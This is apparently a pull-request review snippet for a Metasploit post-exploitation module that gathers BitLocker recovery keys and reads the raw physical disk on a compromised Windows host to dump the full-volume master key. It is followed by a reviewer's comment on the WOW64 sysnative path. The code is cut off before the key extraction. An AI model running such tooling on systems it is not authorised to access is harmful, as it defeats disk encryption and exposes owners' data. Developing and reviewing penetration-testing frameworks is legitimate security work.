modules/post/windows/gather/bitlocker_fvek.rb

```diff
@@ -0,0 +1,137 @@
+  include Msf::Post::File
+
+  ERROR = Msf::Post::Windows::Error
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Bitlocker Master Key (FVEK) Extraction',
+      'Description'  => %q{
+        This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally
+        or can be generated, dump the Bitlocker master key (FVEK)
+      },
+      'License'      => 'MSF_LICENSE',
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter'],
+      'Author'       => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
+      'References'   => [
+        ['URL', 'https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc'],
+        ['URL', 'http://www.hsc.fr/ressources/outils/dislocker/']
+      ]
+    ))
+
+    register_options(
+      [
+        OptString.new('DRIVE_LETTER', [true, 'Dump informations from the DRIVE_LETTER encrypted with Bitlocker', nil]),
+        OptString.new('RECOVERY_KEY', [false, 'Use the recovery key provided to decrypt the Bitlocker master key (FVEK)', nil])
+      ], self.class)
+  end
+
+  def run
+    file_path = session.sys.config.getenv('windir') << '\\system32\\win32k.sys'
+    major, minor, _build, _revision, _branch = file_version(file_path)
+    winver = (major.to_s + '.' + minor.to_s).to_f
+
+    fail_with(Failure::NoTarget, 'Module not valid for OS older that Windows 7') if winver <= 6
+    fail_with(Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
+
+    drive_letter = datastore['DRIVE_LETTER']
+    system_root = expand_path('%SYSTEMROOT%')
+
+    cmd_out = cmd_exec('wmic', "logicaldisk #{drive_letter}: ASSOC:list /assocclass:Win32_LogicalDiskToPartition")
+
+    @starting_offset = cmd_out.match(/StartingOffset=(\d+)/)[1].to_i
+
+    drive_number = cmd_out.match(/DiskIndex=(\d+)/)[1]
+
+    r = client.railgun.kernel32.CreateFileW("\\\\.\\PhysicalDrive#{drive_number}",
+                                            'GENERIC_READ',
+                                            'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
+                                            nil,
+                                            'OPEN_EXISTING',
+                                            'FILE_FLAG_WRITE_THROUGH',
+                                            0)
+
+    if r['GetLastError'] != ERROR::SUCCESS
+      fail_with(Failure::Unknown,
+        "Error opening #{drive_letter}. Windows Error Code: #{r['GetLastError']}
+         - #{r['ErrorMessage']}")
+    end
+
+    @handle = r['return']
+    print_good("Successfuly opened Disk #{drive_number}")
+    seek(0)
+
+    if !datastore['RECOVERY_KEY'].nil?
+      print_status('Using provided recovery key')
+      recovery_key = datastore['RECOVERY_KEY']
+    else
+      print_status('Trying to gather a recovery key')
+
+      cmd_out = cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
```

Comment:
AFAIK, this is a 32 vs. 64-bit WOW64 thing.  I read "Starting with Vista, there’s a very simple way to reach the true System32 directory from the WOW: Look for %WINDIR%\sysnative. This is a virtual directory available only to 32-bit applications on 64-bit operating systems which points to the true %WINDIR%\System32."

So we probably just need to switch based on the detected arch.